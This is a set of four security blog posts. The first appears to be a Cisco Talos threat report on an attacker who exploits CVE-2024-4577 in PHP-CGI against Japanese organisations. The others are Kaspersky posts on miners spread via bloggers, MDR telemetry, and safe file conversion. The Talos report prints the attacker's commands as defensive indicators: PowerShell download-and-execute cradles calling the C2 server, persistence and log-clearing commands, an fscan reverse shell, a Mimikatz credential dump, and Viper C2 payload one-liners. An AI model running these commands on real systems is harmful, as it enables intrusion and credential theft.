• Cisco Talos discovered malicious activities conducted by an unknown attacker since as early as January 2025, predominantly targeting organizations in Japan.  
• The attacker has exploited the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines.  
• The attacker utilizes plugins of the publicly available Cobalt Strike kit “TaoWu” for-post exploitation activities. 
• Talos found a pre-configured installer script on the command and control (C2) server that deploys a full suite of adversarial tools and frameworks hosted on an Alibaba cloud container Registry, highlighting the potential misuse of such tools for malicious purposes by the attacker. 
• Talos noticed the attacker’s attempt at stealing the victim’s machine credentials. However, we assess with moderate confidence that the attacker’s motive extends beyond just credential harvesting, based on our observation of other post-exploitation activities, such as establishing persistence, elevating to SYSTEM level privilege, and potential access to adversarial frameworks, indicating the likelihood of future attacks. 
• We reported an increasing trend of threat actors exploiting vulnerable public facing applications for initial access in our quarterly Talos Incident Response (Talos IR) report for Q4 2024, and the discovery of this intrusion highlights this ongoing activity.  

Victimology  

We found that the attacker predominantly targets organizations in Japan across various business verticals, including technology, telecommunications, entertainment, education, and e-commerce, based on our analysis of command and control (C2) server artefacts.  

Attack overview  

The attacker attempts to compromise the victim machine using an exploit program targeting the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows. In the event of successful exploitation, the attacker executes PowerShell script to run Cobalt Strike reverse HTTP shellcode, ensuring remote access to the victim machine.  

Then, they begin reconnaissance by gathering system details and user privileges. They execute privilege escalation exploit programs, such as JuicyPotato, RottenPotato, and SweetPotato, to gain SYSTEM-level access. They establish persistence by modifying registry keys, adding scheduled tasks, and creating malicious services using the plugins of the Cobalt Strike kit called “TaoWu.”  

To maintain stealth, they erase event logs using wevtutil commands, removing traces of their actions from the Windows security, system, and application logs. They further perform network reconnaissance using “fscan.exe” and “Seatbelt.exe” to map out potential lateral movement targets. The attacker has also attempted to abuse Group Policy Objects using “SharpGPOAbuse.exe” to execute malicious PowerShell scripts across the network. Eventually, they execute Mimikatz commands to dump and exfiltrate passwords and NTLM hashes from memory on the victim’s machine.  

Initial access 

Talos discovered that the attacker gains initial access to the victim’s network by exploiting the vulnerability CVE-2024-4577.  

CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in Windows-based PHP installations using CGI configurations. It arises from the “Best-Fit” behavior in Windows code pages, where certain characters are replaced in command-line inputs. The flaw in the PHP-CGI module misinterprets these characters as PHP options, allowing attackers to execute arbitrary PHP code on the server when using Apache with a vulnerable PHP-CGI setup.  

To target the vulnerability, the attacker leverages a publicly available exploit Python script “PHP-CGI_CVE-2024-4577_RCE.py”. The script checks to see if a specific URL is vulnerable to the CVE-2024-4577 vulnerability. It does this by sending a specifically crafted POST request to a target URL with PHP code designed to trigger the vulnerability. If the response contains the MD5 hash “e10adc3949ba59abbe56e057f20f883e”, it indicates a successful exploitation. Then, the exploit script prompts the user to input commands as PHP code that are executed on the vulnerable servers and gets the response displayed to the attacker.  

In this intrusion, we found that the attacker has executed an embedded PowerShell command in the PHP code to trigger the infection.  

<?php system ('powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http[://]38[.]14[.]255[.]23[:]8000/payload[.]ps1')"');?>

The attacker triggers the infection by executing the PowerShell command through the PHP code, leading to the download and execution of a PowerShell injector script from the C2 server on the victim machine memory.  

The PowerShell injector script is embedded with either base64-encoded or a hexadecimal data blob of the Cobalt Strike reverse http shellcode. Upon execution, it injects and executes the Cobalt Strike reverse HTTP shellcode on the victim machine’s memory and connects to the Cobalt Strike server running on the C2 server over HTTP, enabling remote access to the victim machine.  

The shellcode connects to the C2 server 38[.]14[.]255[.]23 through HTTP using the port 8077 and the URL paths “/6Qeq” or “/jANd”. The attacker has used one of the two HTTP header’s user agents.  

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)

Post-exploitation activities 

After gaining remote access to the victim machine through Cobalt Strike reverse HTTP shellcode, the attacker remotely executes commands on the victim machine from the Cobalt Strike server that is configured with plugins from the “TaoWu” Cobalt Strike kit (hxxps[://]github[.]com/pandasec888/taowu-cobalt_strike) to perform the post-exploitation tasks. 

Below are the post-exploitation commands that we observed in this attack that relate to the MITRE ATT&CK framework. 

Reconnaissance  

ATT&CK Technique: System Owner/User Discovery (T1033) 

The attacker gathers the victim’s system and user information and also checks the time synchronization by remotely executing the following commands on the victim machine.  

whoami  /all 
dir 
net time 

Privilege escalation

ATT&CK Technique: Exploitation for Privilege Escalation (T1068) 

The attacker attempts to elevate the user privileges by executing privilege escalation exploits, including JuicyPotato, RottenPotato, and SweetPotato. These Potato exploits abuse the Windows method of handling authentication and impersonation tokens to escalate privileges from a low-privileged user to SYSTEM user.   

Microsoft has already patched the flaws that these exploits target in Windows 10 and Windows Server 2012, 2016, and 2019, as well as in the latest versions. However, if a Windows process has “SeImpersonatePrivilege” permission enabled that allows a process to impersonate another user’s security token, it could still be abused for privilege escalation using JuicyPotato, SweetPotato, and RottenPotato.  

The attacker uses Ladon[.]exe, a plugin of the “TaoWu” Cobalt Strike kit, to bypass the user access controls in the victim machine.  

Ladon.exe BypassUac C:WindowsTemp123.exe 

Persistence 

ATT&CK Technique: Modify Registry (T1112) 

ATT&CK Technique: Scheduled task/job (T1053)  

ATT&CK Technique: Create or Modify System Process (T1543)  

The attacker leverages the “reg add” command and other .NET plugins of the TaoWu Cobalt Strike kit to modify the registry keys and create the Windows scheduled tasks to establish persistence on the victim machine. 

The attacker executes the “reg add” command to add the path of the beacon executable to the Run registry key. 

reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v Svchost /t REG_SZ /d "C:Windowssystem32cmd.exe" /f C:WindowsTemppayload.exe 

The attacker runs “sharpTask.exe”, a .NET program used to schedule a task on the Windows machine. 

sharpTask.exe --AddTask Computer|local|hostname|ip 24h:time|12:30  some Service "Some Service" C:WindowsTemppayload.exe 

They run “SharpHide.exe”, the utility used to create a hidden registry key.  

SharpHide.exe action=create keyvalue="C:WindowsTemp123.exe" 

They also run “SharpStay.exe”, a .NET tool used to create a service in the Windows machine.  

SharpStay.exe action=CreateService servicename=Debug command="C:Windowstmppayload.exe" 

Detection evasion

ATT&CK Technique: Indicator Removal on Host: Clear Windows Event Logs (T1070.001) 

The attacker erases evidence of their activity on the victim machine by clearing the Windows event logs on the compromised endpoint using the living-off-the-land binary (LoLBin) “wevtutil.exe”.  

wevtutil cl security 
wevtutil cl system 
wevtutil cl application 
wevtutil cl windows powershell 

Lateral movement  

ATT&CK Technique: Lateral Tool Transfer (T1570) 

The attacker uses fscan.exe, an open-source network scanning utility, and Seatbelt, a tool used to collect detailed information about a system—such as remote access configurations, network shares, and other security-relevant data on victim machine —to perform network reconnaissance and lateral movement in the victim network.  

The attacker uploads the utility “fscan.exe” from the C2 server to the “C:WindowsTemp” directory on the victim machine. 

upload /"C2 server path"/fscan.exe 

The attacker runs the .NET program “Seatbelt.exe” to gather the remote access-related information of the victim machine. 

Seatbelt.exe -group=Remote -full 

The attacker runs “SharpGPOAbuse.exe”, a tool used to abuse group policy objects (GPOs) for malicious purposes. The attacker creates a scheduled task via GPO named “update” that runs a PowerShell command across the network, which downloads and executes the attacker’s PowerShell payload. 

SharpGPOAbuse.exe --AddComputerTask --TaskName "update" --Author DOMAINAdmin --Command "cmd.exe" --Arguements "/c powershell.exe -nop -w hidden -c "IEX ((new-object new.webclient).downloadstring('http[://]38[.]14[.]255[.]23[:]8000/payload.ps1'))"" --GPOName "Default Server Policy" 

The attacker runs “fscan” to scan the local subnet of the victim’s network with a range of 256 IP addresses to discover other machines, ports, and services in the sub-network.  

fscan.exe -h 192[.]168[.]1[.]1/24 

The attacker locates SSH services that accept a public key, automating SSH brute-forcing by providing the public key (id_rsa.pub) to gain unauthorized access to SSH-enabled machines. They also attempt to brute-force SSH credentials for services running on a non-default port (2222). 

fscan.exe -h 192[.]168[.]1[.]1/24 -rf id_rsa.pub 
fscan.exe -h 192[.]168[.]1[.]1/24 -m ssh -p 2222 

Using the fscan utility, the attacker opens a reverse shell, enabling the attacker to execute commands on victim machines in the subnet while connecting back to their server on port 6666, and executes the “whoami” command on the accessible machines. 

fscan.exe -h 192[.]168[.]1[.]1/24 -rs 192.168.1.1:6666 
fscan.exe -h 192[.]168[.]1[.]1/24 -c whoami 

Credential access and exfiltration  

ATT&CK Technique: OS Credential Dumping (T1003) 

ATT&CK Technique: OS Credential Dumping: LSASS Memory (T1003.001) 

ATT&CK Technique: Exfiltration Over C2 Channel (T1041) 

The attacker executes Mimikatz commands to gather plaintext passwords and NTLM hashes from memory on the victim’s machine. 

sekurlsa::logonpasswords 

Attacker’s tradecraft has similarities with a hacker group 

We observed the attacker exploiting the weakness in the vulnerable systems to gain initial access and execute Cobalt Strike reverse HTTP beacons to have continued remote access to the victim machine. They have used the Cobalt Strike kit “TaoWu” that has several plugins, including sharpTask.exe, SharpHide.exe, SharpStay.exe, Ladon.exe, and fscan, and Mimikatz  for post-exploitation activities.  

Similar techniques were previously observed being used by the hacker group called “Dark Cloud Shield” or “You Dun” in their attacks in 2024, as reported by the DFIR Report.  

However, we are not attributing the attacks to the “You Dun” group, as we did not observe any further activities after harvesting the victim machine credentials in the current intrusion. 

Potential abuse of adversarial tools and frameworks 

We discovered that the attacker has used two C2 servers with IP addresses 38[.]14[.]255[.]23 and 118[.]31[.]18[.]77 hosted on Alibaba cloud running the Cobalt Strike team server. During our research period, we noticed that the attacker has left the directory listings and access of the root folder to the internet in the C2 server 38[.]14[.]255[.]23, according to our OSINT research artefacts.  

We found PowerShell scripts, Cobalt Strike beacon executables, and exploit programs along with the attacker’s command execution history logs in the C2 server’s exposed folder. Our further analysis of the contents of the exposed folder showed that the attacker had downloaded and executed a pre-configured installer shellscript called  “LinuxEnvConfig.sh” from the repository “yijingsec” on Gitee platform (hxxps[://]gitee[.]com/yijingsec/), a Chinese Git-based platform like GitHub. The author had described that the repository belongs to a network security talent training service provider called “Yijing Network Security Academy,” which indicates that the attacker is likely abusing the legitimate resource for malicious intention. 

The shell script “LinuxEnvConfig.sh” appeared to be designed to configure foundational environments for Ubuntu, Debian, and Kali Linux systems and facilitates the setup of various publicly available offensive security frameworks and tools, including Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus that are packaged and staged  as docker containers in the docker container registry called “registry[.]cn-shanghai[.]aliyuncs[.]com”, an Alibaba cloud container Registry (ACR) located in the Shangai, China, region.   

We also found that the shellscript, when executed by a user, modifies the machine’s DNS settings, pointing to a specific DNS server with the IP address 114[.]114[.]114[.]114, which is a Chinese 114DNS service and is not used very often in other regions. 

We have continued to see various threat actors abusing publicly available tools, such as Cobalt Strike, Metasploit, ARL, Vulfocus, and PowerShell Empire for their malicious intentions. Still, we found that some of the tools and frameworks, such as Blue-Lotus, BeEF, and Viper C2, that the shell script “LinuxEnvConfig” deploys, were not seen very often being held in the possession of an attacker, and we have documented them further in the blog post to provide an overview of the capabilities and functionalities that an attacker could leverage by abusing such tools.  

Blue-Lotus 

Blue-Louts is a JavaScript webshell cross-site scripting attack framework. Blue-Lotus is docker-based and was developed by Firesun[.]me and the Blue Lotus team, a cybersecurity technology competition and research team from Tsinghua University. 

Blue-Louts’ administrative panel is in Chinese with an XSS receiving dashboard that displays the connection details of the victim machine, including the IP address and browser. 

Blue-Lotus has the payload generation panel where the user can generate the JavaScript webshell payload using the default JavaScript template from the tool’s database. An attacker using the framework can generate the webshell  and instrument them in their attacks to perform following tasks: 

• Cross-site scripting (XSS). 
• Screen capture of remote machine.  
• Get the reverse shell access to the remote machine.  
• Steal the browser cookies. 
• Creation of user ID and passwords in the Content Management System (CMS).  

BeEF

BeEF is a publicly available browser exploitation framework that an attacker can hook to one or more web browsers in the victim machine and execute commands within the browser context. BeEF has command modules that consist of JavaScript codes to perform the following tasks: 

• Check if the links, forms, and URI paths of the web page in a hooked browser are vulnerable to XSS. 
• Submit arbitrary requests on behalf of the hooked browser. 
• Interact with the host on the local network of the hooked browser. 
• Send commands to the victim systems through Web Real-Time Communication (WebRTC) caller.  

Viper C2 

The Viper C2 is a modular framework with multiple plugins and scripts that define its extensive functionalities. The C2 has built-in integration with the (MSF) meterpreter console and scripts.  

Viper C2 has functionalities, such as: 

• Antivirus software bypass.  
• Intranet tunnel. 
• File management of the remote machine, such as upload and execute other executable files. 
• Remote command execution on compromised host. 
• Generate payloads of Meterpreter reverse shell in multiple forms that work on Windows, Linux, and MacOS. 
• Display the network topology of the compromised network. 

Viper C2 has the capability of generating the payload of Meterpreter HTTP and TCP reverse shell for multiple platforms, including Windows, Linux, MacOS, Android, Java, and Python. The payloads can be generated in different formats, such as EXE, DLL, ELF, ELF-SO, MSBuild, Macho, PowerShell script, PowerShell command, Python script, and HTA and VBA scripts.  

Viper C2 payload generation panel. 

Generated payloads are delivered to victims using the Viper C2 web delivery commands that the user can generate, including the delivery URL and instrument in their attacks.  

We compiled some of the command formats generated from Viper C2 that assists defenders and threat hunters for hunting threats related to Viper C2, shown below: 

Windows: 

regsvr32 /s /n /u /i:hxxp[://]C2 server:port/SWLonxen.sct scrobj.dll 

Linux: 

wget -qO lYoSQUgn --no-check-certificate hxxp[://]C2 server:port/oegqPVin; chmod +x lYoSQUgn; ./lYoSQUgn& disown 

PHP: 

php -d allow_url_fopen=true -r "eval(file_get_contents(' :/bIBNfnlE', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false] ])));" 

Python: 

python -c "import sys;import ssl;u=import('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlope n',));r=u.urlopen(' :/wXAOAUIK', context=ssl._create_unverified_context());exec(r.read());" 

PowerShell: 

[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
 
$pbFU=new-object net.webclient; 
if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null)
{$pbFU.proxy=[Net.WebRequest]::GetSystemWebProxy(); 
$pbFU.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;}; 
IEX ((new-objectNet.WebClient).DownloadString(‘C2 server:port/WyeslpUl/KaptrNuHdqhM’)); 
IEX ((new-objectNet.WebClient).DownloadString(‘C2 server:port’); 

Linux download and execute: 

wget -O 1737698200.elf --no-check-certificate hxxps[://]C2 server:port 
/api/v1/d/?en=/6trTQMIGpJgIMksMielQg%3D%3D && chmod 755 
1737698200.elf && ./1737698200.elf 

Coverage 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort SIDs for this threat: 

Snort 2: 64632, 64633, 64630, 64631. 

Snort 3: 301157, 301156. 

Indicators of Compromise 

IOCs for this threat can be found in our GitHub repository here. 

Cisco Talos Blog – ​Read More

Over the past six months, Windows Packet Divert drivers for intercepting and modifying network traffic on Windows systems have become popular in Russia. From August to January 2024, we noted that detections of these drivers almost doubled. The main reason? These drivers are being used in tools designed to bypass restrictions for accessing foreign resources.

This surge in popularity hasn’t gone unnoticed by cybercriminals. They’re actively distributing malware disguised as bypassing tools — and they’re doing it by blackmailing bloggers. So, every time you watch a video titled something like “How to bypass restrictions…”, be especially cautious — even the most reputable content creators might unknowingly be spreading stealers, miners, and other malware.

How cybercriminals exploit unsuspected users — and where bloggers fit into the picture — is what we’ll explore in this article.

Hackers disguised as honest developers

There are plenty of software solutions designed to bypass restricted access to foreign platforms, but they all have one thing in common — they’re created by small-time developers. Such programs spread organically: an enthusiast writes some code, shares it with friends, makes a video about it, and voilà — yesterday’s unknown programmer becomes a “people’s hero”. His GitHub repository is starred tens of thousands of times, and people thank him for restoring access to their favorite online resources. We recently wrote about one such case where cybercriminals boosted GitHub repositories containing malware.

There may be dozens or even hundreds of such enthusiasts — but who are they, and can they be trusted? These are key questions both current and potential users of these programs should be asking. A major red flag is when these developers recommend disabling antivirus protection. Disabling protection to voluntarily give a potential hacker access to your device? That’s a risky move.

Of course, behind the mask of a people’s hero might be a hacker looking for profit. An unprotected device is vulnerable to malware families like NJRat, XWorm, Phemedrone, and DCRat, which have been commonly spread alongside such bypassing software.

Where do bloggers fit in?

We’ve identified an active miner distribution campaign that has claimed at least two thousand victims in Russia. One of the infection sources was a YouTube channel with 60,000 subscribers. The blogger uploaded several videos on bypassing restrictions, with a link to a malicious archive in the description. These videos accumulated over 400,000 views in total. Later, the channel owner deleted the link, leaving this note: “Download the file here: (program does not work)”. Originally, the link led to the fraudulent site gitrok[.]com, where the infected archive was hosted. According to the site’s counter, at the time of our study the bypassing tool had been downloaded at least 40,000 times.

Don’t rush to put all the blame on the bloggers — in this case, they were simply following the orders of cybercriminals, unaware of what was really going on. Here’s how it works. First, the criminals file a complaint against a video about such a restriction-bypassing tool, pretending to be the software’s developers. Then they contact the video creator and persuade them to upload a new video, this time containing a link to their malicious website — claiming that this is now the only official download page. Of course, the bloggers have no idea the site is distributing malware — specifically, an archive containing a miner. And for those who’ve already uploaded three or more videos on the topic, refusal is not an option. The hackers threaten to file multiple complaints, and if there are three or more, the channel would be deleted.

In addition, the criminals spread their malware and installation guides through other Telegram and YouTube channels. Most of these have been deleted — but there’s nothing to stop them from creating new ones.

What about the miner?

The malware in question was a sample of SilentCryptoMiner, which we covered in October 2024. It’s a stealthy miner based on XMRig, another open-source mining tool. SilentCryptoMiner supports mining of multiple popular cryptocurrencies, including ETH, ETC, XMR, RTM, and others. The malware stops mining upon detecting certain processes, the list of which the criminals can provide remotely to evade detection. That makes it nearly impossible to detect without reliable protection.

For more about the malicious archive and how it persists in the system, check our post on Securelist.

How to protect yourself from miners

• Ensure that all personal devices have trusted protection to safeguard against miners and other malware.
• Avoid downloading programs from obscure or little-known sources. Stick to official platforms, but remember — malware can creep into them too.
• Keep in mind that even the most reputable bloggers can unknowingly spread malware, including miners and stealers.

Here are some relevant articles you can read to learn more about miners and their dangers:

Mario Forever, malware too: a free game with a miner and Trojans inside

XMRig Miner as a New Year’s gift

Prices down, miners up

Kaspersky official blog – ​Read More

To effectively counter cyberthreats that circumvent basic security measures, a managed detection and response (MDR) service must ensure the right data collection tools are in place in the protected organization from the start. In addition, the service team and the client team should regularly discuss how to improve telemetry collection, and what other data should be collected in order to stay ahead of evolving attacker tactics. Our experts not only advise clients on proper data collection, but also closely monitor the changing threat landscape to continuously refine the process. Our latest MDR service report details incidents in client infrastructures and the tactics attackers have used. A dedicated section of the report covers the most frequently triggered detection rules in 2024, and what’s required for them to function effectively.

Dumping registry hives

Among the suspicious operations frequently detected in high-severity incidents, the most common by far is the extraction of security-critical data from the system registry (dumping of sensitive registry hives). This activity was observed in 27% of high-severity incidents.

To detect such extraction, the MDR provider must have telemetry from an EDR system installed on all computers and servers in the protected organization. If there’s an endpoint protection system (EPP) that can detect suspicious (not necessarily malicious) activity, this can also serve as a source of the necessary data. An event that most definitely should be logged is registry access.

Malicious code in memory

Many attacks occur in such a way that malicious files are never stored on the hard drive. However, an endpoint protection system can detect malicious code in the memory of a system process or another memory segment. This occurred in 17% of high-severity incidents, and such events from the EPP must be instantly visible to the MDR service.

Suspicious services

The creation and execution of Windows services containing suspicious arbitrary code is a strong indicator of an unfolding cyberattack. This was also detected in nearly 17% of high-severity incidents. To detect this activity, telemetry must include OS system events, process launch information, and the complete contents of all startup lists.

Access to a malicious host

Though seemingly simple, this event appeared in 12% of high-severity incidents, and requires an up-to-date IP reputation database for detection. In a company’s infrastructure, access attempts can be tracked in multiple ways: EPP detection, network-level monitoring, and DNS/HTTP request analysis. The MDR provider can also use threat intelligence databases to enrich the client’s telemetry.

Memory fragment dumps

To escalate an attack within a victim’s network after the initial compromise, attackers often try to obtain credentials on an infected machine. If they get lucky, these may be network administrator credentials, allowing them to quickly take over servers. A classic technique for achieving this is extracting and saving memory fragments related to the LSASS (Local Security Authority Subsystem Service). In 2024, we detected this technique in nearly 12% of high-severity incidents.

Attempts to capture LSASS memory can be detected in multiple ways: using certain EPP and EDR rules, analyzing command-line parameters when launching applications, scripts and processes, and monitoring access to LSASS.

Executing a low-reputation object

Although a file, script, or document may not be definitively malicious, if it was previously observed in suspicious activity, MDR specialists must check whether a cyberattack is underway. This requires telemetry that logs processes launching suspicious files. And, of course, threat intelligence is needed to flag the file’s bad reputation. Execution of low-reputation objects was observed in 10% of high-severity incidents.

Adding privileged users

Beyond stealing administrator accounts, attackers often create their own accounts and then elevate their privileges. In 9% of high-severity incidents, an account was added to a privileged corporate domain group. To detect this, OS event collection must capture all account modifications.

Remote process execution

In over 5% of incidents, there was a process involved that was launched by a remote user. To monitor such events, computers must log process launch events and the loading of executable file sections into memory.

Malicious address in event parameters

In any event-parameters — but most commonly in the command line of the running process — a known malicious URL may appear. This was observed in nearly 5% of high-severity incidents, making it crucial to always include detailed parameters of logged events, including the full command line, in the telemetry. For MDR providers, such detection is only possible with access to a large URL-reputation database (which we, of course, have).

Telemetry sources

Above, we’ve highlighted the most critical events that help an MDR team detect and prevent serious incidents. The full report covers additional events and a deeper analysis of attacker tactics. The list above makes it clear what types of data must be transmitted to an MDR service in real time for it to work effectively. First and foremost, this includes:

• Telemetry from endpoint protection solutions (EPP) or EDR agents. In today’s organizations, traditional “antivirus” and detection and response tools are often integrated into a single product. This provides key telemetry from computers and servers, so its presence is essential on all machines, along with the configuration of detailed event logging in collaboration with the MDR team.
• OS events. Properly configured Windows logs provide critical information about account manipulations, process launches and terminations, and more. On Linux systems, the same role is played by Audit Daemon (aka auditd). Special attention must be given to configuring logging on all of the organization’s servers. Detailed recommendations for settings for Windows can be found in our knowledge base. The Sysmon tool from the Microsoft Sysinternals suite enhances the effectiveness of Windows logs.
• Events from network devices. It’s critical to configure detailed logging on network devices — primarily firewalls and web filters, but also routers, proxies, and DNS servers if used in the company.
• Cloud environment logs. Attackers frequently compromise cloud infrastructure and SaaS tools, where the previously mentioned logs are typically not available. Therefore, it’s essential to set up comprehensive security-focused logging using cloud-native tools, such as AWS CloudTrail.

Kaspersky official blog – ​Read More

You almost certainly know the situation when a friend or colleague sends you files in a format you can’t open. For example, you asked for photos, expecting JPEGs or PNGs, but instead they arrive in HEIC format. What do most people do in this case? That’s right, they look for a free online file-converter.

If you’re a long-time reader of our Kaspersky Daily blog, you probably already know that the most popular method of doing most anything is hardly ever the safest. File conversion is no different. Let’s figure out together what threats are lurking inside free online-converters, and find out how to change file format safely.

Why is this important? Because converting a file is not simply a matter of changing its extension — otherwise you could just rename the file from, say, EPUB to MP3. Instead, the converter program must read the file, understand what it contains, convert the data and re-save it in a different format — and each of these stages poses its own threats.

Personal data leakage, malware, and other threats

The first risk that springs to mind is personal data leakage. Even if you’re a “who on earth needs my data?” kind of person, you should still take care: your vacation snaps may be of no use to anyone, but confidential work documents are a different kettle of fish. When you upload a file to an online converter, you can never be sure that the site won’t save a copy of your file for its own purposes. Uploaded data can easily end up in the hands of scammers, and even be used to launch an attack on your company. And if you get fingered as the intruders’ entry point into the corporate network, your infosec team will hardly be thanking you.

If you think this threat applies solely to text or spreadsheet documents, and that a photo of some accounting statement can be safely uploaded and converted to PDF, think again. Optical character recognition (OCR) was invented last century, and now, with AI, even mobile Trojans have learned to extract data of interest to attackers from photos in your smartphone gallery.

Another common risk is malware infection. Some dubious converter sites may modify your files or add malicious code to the converted file — and without reliable protection you won’t know about it until it’s too late. The converted files may contain scripts, Trojans, macros, and other nasty stuff we’ve covered in detail many times.

Converter sites may also be phishing, so services asking you to register, enter a load of personal data, and buy a subscription just to convert a file from, say, PDF to DOC, should be eyed with suspicion. If you still plan to use an online converter, look for one that doesn’t require registration, and never give it your payment details.

How to convert files locally

The safest way is to convert files locally; that is, on your own device without using third-party sites. This way, the data is guaranteed to remain confidential — at least until you connect to the internet. You can change a file’s format using either system tools or popular programs.

For text and spreadsheet files, as well as presentations, Microsoft Office can help. It can read many file formats using the File → Open or File → Import commands (depending on the version of Office and the operating system), and save them in different formats using the File → Save as → Save as type (or File format) or File → Export commands. The list of available formats is long: from PDF and HTML to the OpenDocument standard.

If you don’t have access to Microsoft products, you can use the free alternatives LibreOffice and OpenOffice, which also support various text and table file formats. On Windows, text documents can also be converted in a built-in WordPad editor, although it reads far fewer file types.

For macOS users, Apple’s office applications (Pages, Numbers, Keynote) recognize and save documents in many different formats.

As for graphics files, things are even simpler. Built-in operating-system tools can help convert images from PNG to JPEG. On Windows, just use this command in Paint: File → Save as. macOS users don’t even need to open any programs — just right-click the image in Finder and select Quick Actions → Convert Image. The window that opens gives you a choice of format (PNG, JPEG, HEIF) and converted image size.

If the above conversion options aren’t enough — for example, you’re handling audio/video files or specific file formats — look for offline tools with a solid reputation as free and open-source software (FOSS).

For video (and many audio) formats, check out Handbrake (Windows, macOS, Linux) and Shutter Encoder (Windows, macOS, Linux); for audio, try Audacity, and for images, ImageMagick (Windows, macOS, Linux).

Most multimedia converters simply add a graphical interface to FFmpeg, perhaps the top tool for converting multimedia formats. Its only drawback (which for some is a plus) is that it only works from the command line.

If you’re fine with the command line, FFmpeg is the obvious choice (but, being fine, you’ve probably got it installed already). Another great choice for command line fans is Pandoc — a versatile converter of text and markup formats. Incidentally, under Extras on the Pandoc website, you can find many third-party utilities for adding a graphical interface to this converter, or embedding it in other editors, services, or even operating systems.

All of the above converters are FOSS (free and open-source software), and support at least the most popular operating systems: Windows, macOS, Linux.

When choosing other offline converters, make sure that the conversion really does take place locally — many tools simply provide an interface to online converters and still send your source files to a server. This is very easy to check by disconnecting from the internet before converting. If the tool doesn’t work, it’s not an offline converter.

How to convert files online as safely as possible

Sometimes there’s no avoiding online converters — for example, you were sent a file in some highly exotic or outdated format. The next section looks at how to minimize threats when converting files online.

Alas, it’s impossible to guarantee confidentiality when using an online converter. Its creators can write whatever they want in the site’s policies, but you’ll never know what actually happens to your uploaded data. Therefore, the golden rule is: never convert sensitive information online.

If you have a Google account (and who doesn’t?), you can upload the file you want to convert to Google Drive (most office formats are accepted), right-click, and open it in Google Docs/Sheets/Slides, then download it in a different format. Among the pluses, this method also works on mobile devices — although in this case it’s more convenient to open the file in the relevant Google editing tool.

Another fairly safe way to convert either text or graphics files is Adobe’s online converter. You can even use it for free on a smartphone — but there’s a catch: all uploaded data gets stored on Adobe’s servers, making this method unsuitable for confidential files.

Follow these rules to ensure maximum safety when converting files online:

• Use reputable online converters.
• Open the converter site in a new browser window in Incognito mode; this will reduce the amount of information collected about you — but not down to zero.
• Use a reliable VPN to hide your real IP address from the converter site.
• Review the online converter’s privacy policy to understand how your data will be handled. Make sure the service does not collect, store, or transfer information without your consent — or at least claims not to.
• Check that the files for conversion do not contain confidential information.
• Scan the converted files with an antivirus. Be very wary if the converter site wants you to download the result in an archive — especially a password-protected one, since this is the most common way to conceal a virus from security software. If you don’t have any protection software on your device (heaven forbid), you can scan the downloaded file using our online file checker.
• Avoid unverified sites that require registration and payment details.

Unzip this

Lastly, a small life-hack that few people know about. Sometimes you don’t need to convert a file to another format at all, but just extract information from it; for example — pull images out of a text document or presentation in their original format. Doing this even with native editors is usually time-consuming and inconvenient — you have to export the images one by one, and the editors might change their size or compress them, deteriorating the picture quality.

But there’s a way round this. The secret is that files of many formats are nothing more than a compressed folder with subfolders that store “pieces of the puzzle”: text, images, embedded videos, and the like. And it’s all zipped. That means that almost all office-suite files are ZIPs with the extension changed to DOCX, PPTX, PAGES, etc.

To extract all the contents from this “archive”, you simply need to rename the file, changing its extension to ZIP, and then unzip it. The result will be a folder with subfolders in which all the “ingredients” of the original document are neatly laid out.

So, if you come across an unknown file format, first of all scan it for viruses with a reliable security solution, then make a copy of it, change the extension to ZIP (in macOS, if the file extension is hidden, you may need to press ⌘+I to change it), and try to unzip the file — in many cases this will work. Next, have a rummage around in the resulting folder — you’ll find all sorts of goodies!

Kaspersky official blog – ​Read More